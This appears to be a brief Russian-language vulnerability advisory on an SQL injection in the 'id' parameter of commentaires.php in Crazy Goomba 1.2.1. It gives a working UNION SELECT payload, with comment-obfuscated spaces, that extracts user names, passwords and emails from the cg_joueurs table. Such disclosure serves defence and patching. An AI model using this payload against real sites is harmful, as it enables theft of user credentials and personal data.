Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Crazy Goomba 1.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием commentaires.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]
1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**